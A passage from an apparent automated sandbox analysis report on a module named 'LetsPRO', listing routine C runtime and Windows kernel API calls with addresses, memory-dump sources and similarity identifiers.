                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952297
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$__cenvarg__dospawn_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1531270514-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C951D0E,?,000000FF,?,00000000,00000000), ref: 6C951BA7
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C951D0E,?,000000FF,?,00000000,00000000), ref: 6C951BB2
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __cenvarg.LIBCMT ref: 6C951BD3
                                        • __dospawn.LIBCMT ref: 6C951BEC
                                        • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C951BF6
                                        • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C951BFE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$__cenvarg__dospawn_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1531270514-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC1
                                        • _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC8
                                        • _wfullpath.MSVCR100(?,?,?,?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DD9
                                          • Part of subcall function 6C9039FD: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6C903A42
                                        • _errno.MSVCR100 ref: 6C917DE3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$FullNamePath_wfullpath
                                        • String ID:
                                        • API String ID: 3755888649-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,00000000,6C9478A9), ref: 6C9478C3
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 6C9478D7
                                        • SetEvent.KERNEL32(?), ref: 6C9478E4
                                        • CloseHandle.KERNEL32(?), ref: 6C9478FA
                                        • CloseHandle.KERNEL32(?), ref: 6C9478FE
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947901
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@EventFlushInterlockedListObjectSingleWait
                                        • String ID:
                                        • API String ID: 751808093-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C915C68
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C92A1F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: $
                                        • API String ID: 2959964966-3993045852
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C900C13
                                        • _errno.MSVCR100(?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C90A464
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C92A423
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfoiswctype
                                        • String ID: $
                                        • API String ID: 1743973646-3993045852
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?,00000000), ref: 6C942A21
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?,00000000), ref: 6C942AA3
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?), ref: 6C942BD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$,
                                        • API String ID: 0-220654547
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 6C93C749
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C93C80A
                                        • SetEvent.KERNEL32(?), ref: 6C93C819
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterEventLeave
                                        • String ID: $$,
                                        • API String ID: 3094578987-53852779
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __fltout2.LIBCMT ref: 6C980291
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C98029D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9802A4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C9802EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: I10____dtold__fltout2__fptostr_errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                        • String ID: -
                                        • API String ID: 3041646763-2547889144
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: P
                                        • API String ID: 2959964966-3110715001
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • memcpy.MSVCR100(?,?,00000018), ref: 6C93B497
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000018), ref: 6C93B4B0
                                        • _memset.LIBCMT(00000000,00000000,?), ref: 6C93B4E1
                                        • memcpy.MSVCR100(?,?,00000008), ref: 6C93B507
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: memcpy$_memset
                                        • String ID: ,
                                        • API String ID: 2982297706-3772416878
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C9403CA: TlsGetValue.KERNEL32(6C9361E5), ref: 6C9403DC
                                        • GetCurrentThreadId.KERNEL32 ref: 6C94AC12
                                        • swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6C94A994,?,?,000000F8), ref: 6C94AC3C
                                        • vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC5E
                                        • _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThreadValue_wcslenswprintfvswprintf_s
                                        • String ID: [%d:%d:%d:%d(%d)]
                                        • API String ID: 3978057885-3832470304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • strcat_s.MSVCR100(6C906E68,6C906E47,6C906E58,?,00000083,00000083,?,6C906E5C,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000), ref: 6C904DB5
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000,00000005), ref: 6C930B34
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C930B3F
                                        • _strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6C930B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __invoke_watson$_strcspnstrcat_s
                                        • String ID: _.,
                                        • API String ID: 4004410220-2709443920
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                        • std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                        • _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateExceptionQueueThrowTimerstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3396838967-2104205924
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90C600
                                        • _malloc_crt.MSVCR100(00000018,00000014,6C90C681,00000000,00000000,?), ref: 6C90C60D
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • std::exception::exception.LIBCMT(?,00000001,00000014,6C90C681,00000000,00000000), ref: 6C927300
                                        • _CxxThrowException.MSVCR100(6C90C681,6C90C8D8,?,00000001,00000014), ref: 6C927315
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 2340149201-2104205924
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                        • _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901E7E: _unlock.MSVCR100(0000000D,6C901F2F), ref: 6C901E80
                                        • _lock.MSVCR100(0000000C), ref: 6C901F31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 2973837600-2576044830
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C94583D
                                          • Part of subcall function 6C9454A1: __EH_prolog3.LIBCMT ref: 6C9454A8
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9458B2
                                        • _CxxThrowException.MSVCR100(?,6C9A0CD4), ref: 6C9458C0
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C945A06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_os$ExceptionH_prolog3H_prolog3_catchThrowValue
                                        • String ID:
                                        • API String ID: 1539510839-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___libm_error_support.LIBCMT ref: 6C8F3ED5
                                          • Part of subcall function 6C99B408: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6C9195E3), ref: 6C99B426
                                          • Part of subcall function 6C99B408: _errno.MSVCR100 ref: 6C99B4C5
                                        • __ctrlfp.LIBCMT ref: 6C99B817
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecodePointer___libm_error_support__ctrlfp_errno
                                        • String ID:
                                        • API String ID: 3902546397-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A63
                                        • _invalid_parameter_noinfo.MSVCR100(6C957BC8,00000008), ref: 6C957A6E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A82
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A9B
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957B85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C01
                                        • _invalid_parameter_noinfo.MSVCR100(6C953D58,00000008), ref: 6C953C0C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C20
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C39
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953D1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • strncmp.MSVCR100(?,?,00000000,00000080,00000080), ref: 6C9603DE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID:
                                        • API String ID: 1114863663-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 6C960CF9
                                        • _errno.MSVCR100(?,?,?), ref: 6C960D1F
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6C960D2A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(?,?,?,?), ref: 6C960D4E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6C960D59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
